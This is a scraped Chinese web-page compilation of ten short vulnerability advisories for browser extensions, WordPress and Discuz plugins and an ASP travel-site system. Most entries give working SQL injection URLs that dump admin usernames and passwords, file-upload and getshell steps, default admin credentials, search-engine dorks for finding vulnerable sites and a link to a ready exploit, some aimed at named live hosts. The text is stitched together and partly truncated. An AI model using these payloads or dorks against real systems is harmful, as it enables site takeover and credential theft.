有道Chrome浏览器划词插件xss漏洞漏洞预警(精选10篇)由网友“在树上点歌”投稿提供,下面是小编整理过的有道Chrome浏览器划词插件xss漏洞漏洞预警,欢迎您阅读,希望对您有所帮助。
篇1:有道Chrome浏览器划词插件xss漏洞漏洞预警
简要描述:
有道词典划词翻译(chrome插件),选中特殊构造的文字时,进行划词翻译,并执行了相关代码,
详细说明:
也许你只是想复制以上代码,而选中他们,并不是想划词翻译
有道词典插件版本:1.0
cidian.youdao.com/chromeplus/
漏洞证明:
happytreebb.lofter.com/post/1a143d_51816e
篇2:WordPress插件漏洞0day漏洞预警
其实就是一个fck的洞子,不过有条件的哦,要这个插件EditorMonkey
嘿嘿。
xxxx.com/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
upload shell.php.jpg
xxxx.com//UserFiles/shell.php.jpg
篇3:WordPress插件EditorMonkey上传漏洞漏洞预警
WordPress插件EditorMonkey存在上传漏洞,用WINDOWS
系统的请注意哦。这漏洞也就是fckeditor的上传洞。没必要在讲了,
大家在熟悉不过啦。还是自带的编辑器安全一点。
漏洞测试如下:
www.tmdsb.com/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
上传什么文件大家多懂的,
上传后文件在www.tmdsb.com/UserFiles/tmdsb.txt
谷歌搜索一下,好多用这插件的博客。
关键字:wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
篇4:wordpress 插件 editormonkey 远程上传漏洞漏洞预警
editormonkey是wordpress的一个后台编辑器插件,
前好多天在inj3ct0r上公布了,也被相继了,个人觉得不是很完美。
都是直接上传得到一个x.php.jpg的shell。
完全可以用FCK的0day直接得到一个phpshell。
GOOGLE dork:inurl:”plugins/editormonkey”
EXP:
Upload a new file:
篇5:Discuz!黑道生涯插件注射漏洞漏洞预警
插件版本:2.2 2.5
注册一个论坛ID
IE提交下面代码
blackband.php?mode=yule&action=enjoy&id=2 and 1=2 union select 1,0x2D312C67726F757069643D312C61646D696E69643D31,3,4/
提升到管理员
discuz7.0.0后台得webshell方法
www.oldjun.com/blog/index.php/archives/48/
如果是discuz6.0 的后台就提交
admincp.php?action=styles&edit=1
最后得到的webshell地址还是forumdata/cache/style_1.php
篇6:WP ProPlayer 插件= 4.7.7 注入漏洞漏洞预警
# Exploit Title: ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability
# Date: -08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: downloads.wordpress.org/plugin/proplayer.4.7.7.zip
# Version: 4.7.7 (tested)
Poc:
www.site.com/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=-1') UNION ALL SELECT NULL,NULL,@@version--%20
function getPlaylist($id = '') { $query = mysql_query(“SELECT * FROM ”.$this->tablePrefix.“proplayer_playlist WHERE (POST_ID='$id')”); $playlistRow = mysql_fetch_row($query); return $this->withBackwardCompatibility($playlistRow[2]);} ... if (!empty($_GET[“pp_playlist_id”])) { header(“Content-type: application/xml”); $xml = $playlistController->getPlaylist($_GET[“pp_playlist_id”]);
篇7:智有道专业旅游系统 v1.6.5 漏洞漏洞预警
############################################################################
#
# Title: 智有道专业旅游系统 v1.6.5 漏洞
# Time:2011-10-30
# Team:makebugs
# Author: 缘分
############################################################################
注入篇:
t.qq.com/MakeBug
hi.baidu.com/micropoor
'incincsql.asp
<%
dim sql_leach,sql_leach_0,Sql_DATA,SQL_Get,Sql_Post
sql_leach = “',and,exec,insert,select,delete,update,count,*,%,chr,mid,master,truncate,char,declare”
sql_leach_0 = split(sql_leach,“,”)
If Request.QueryString“” Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(sql_leach_0)
'略
If Request.Form“” Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(sql_leach_0)
if instr(Request.Form(Sql_Post),sql_leach_0(Sql_DATA))>0 Then
Response.Write(“err”)
'略
%>
过滤问题,但是在部分取值的时候:
<%
id=ReplaceBadChar(replace(trim(request(“id”)),“'”,“”)) '注意ID
sql=“select * from car where id=”&id&“”
set rs=server.CreateObject(“ADODB.recordset”)
rs.open sql,conn,1,1
if rs.eof and rs.bof then
'略
end if
%>
其中也有没有过滤的页面,
智有道专业旅游系统 v1.6.5 漏洞漏洞预警
,
例如:
<%
dim id
id=checkStr(request.QueryString(“id”)&“”)
dim objhttp,strrequest,xmldoc,bok
Set bjHTTP = Server.CreateObject(“MSXML2.XMLHTTP”)
strRequest = “sceneryId=”&id&“”
shell篇:
智有道专业旅游系统1.1--v1.6.5版本都有着同样的问题:
127.0.0.1/admin/do/admin_uploadfile.asp?id=1&dir=../..
127.0.0.1/admin/do/Admin_Style.asp
127.0.0.1/admin/do/data.asp
其他信息:
数据库默认:wklksdatabbcctour.asp 可考虑插入一句话
上传问题:incUpfile_Photo.asp
篇8:智有道专业旅游系统 v1.0 漏洞漏洞预警
默认信息:
“智有道”专业旅游网站系统是智有道团队专业开发,针对目前的旅游平台进行强大的功能开发!
后台管理
后台路径:admin/login.asp
管理员:user:admin
密码:psw:123456
下载地址:down.chinaz.com/soft/30295.htm
Demo Url:will.w701.hzdemo.cn/
exp:
will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15,16,17 from admin
或者:
will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
遍历目录:
www.0855.tv/admin/do/admin_uploadfile.asp?id=1&dir=../..
其它:
www.0855.tv/admin/do/Admin_Style.asp
www.0855.tv/admin/do/data.asp
关键字:
为防批量,特略,
智有道专业旅游系统 v1.0 漏洞漏洞预警
,
篇9:Discuz!账号发放插件注入0day漏洞预警
Discuz!账号发放插件注入0day
插件名:2Fly礼品(序号)发放系统
漏洞文件:2fly_gift.php
版本:最新版
Exp:www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members
搜索引擎特征:inurl:2fly_gift.php
上图:
篇10:Discuz! X Getshell漏洞EXp(自带插件)漏洞预警
dz0day 公布~
其实咱尖刀内部已经玩废了-,-
顺便膜拜下疯子大牛...
===
在看之前我们首先要像乌云提交的作者致敬,因为是他那个标题才让我们尖刀团队研究出来的,当然如果有人硬是要说抄袭也可以,我们做我们的,你们说你们的,这是我们一贯的风格。
作者:网络尖刀安全团队
#1 这漏洞出现在一个DZ X系列自带的转换工具里面!
漏洞路径:utility/convert/data/config.inc.php
#2 在开始设置里面可以设置数据的属性,而post的数据直接写到了config.inc.php这个文件里面,无任何过滤检测!
#3 然后小伙伴们写一半的shell没用,最后尖刀的某个小伙伴说直接修改表单,然后成功!
#4 打开EXP直接修改您需要的网站然后直接点击保存即可,
shell连接utility/convert/data/config.inc.php 密码c
exp链接: pan.baidu.com/s/1kTFib1l 密码: ku87
★ 响应承诺书
【有道Chrome浏览器划词插件xss漏洞漏洞预警(精选10篇)】相关文章:
FCKeditor 建立文件夹、上传文件时“.”变“”的突破漏洞预警2023-08-07
WordPress简单安全设置2022-04-29
科普:小议OAuth 2.0认证缺陷2022-04-29
脚本本地/远程文件包含/读取及文件名截断漏洞FUZZ工具详解漏洞预警2023-07-12
如何让电脑免遭网络病毒的危害?2023-07-28
Discuz! X2.5 Beta版发布 供站长体验与测试2022-05-12
求职信病毒的危害2022-08-16
有关观看315晚会的作文:个人的消费理念2023-02-07
FLASHFlash+php+mysql简单留言本制作2022-05-06
上传漏洞终结篇讲解2022-10-05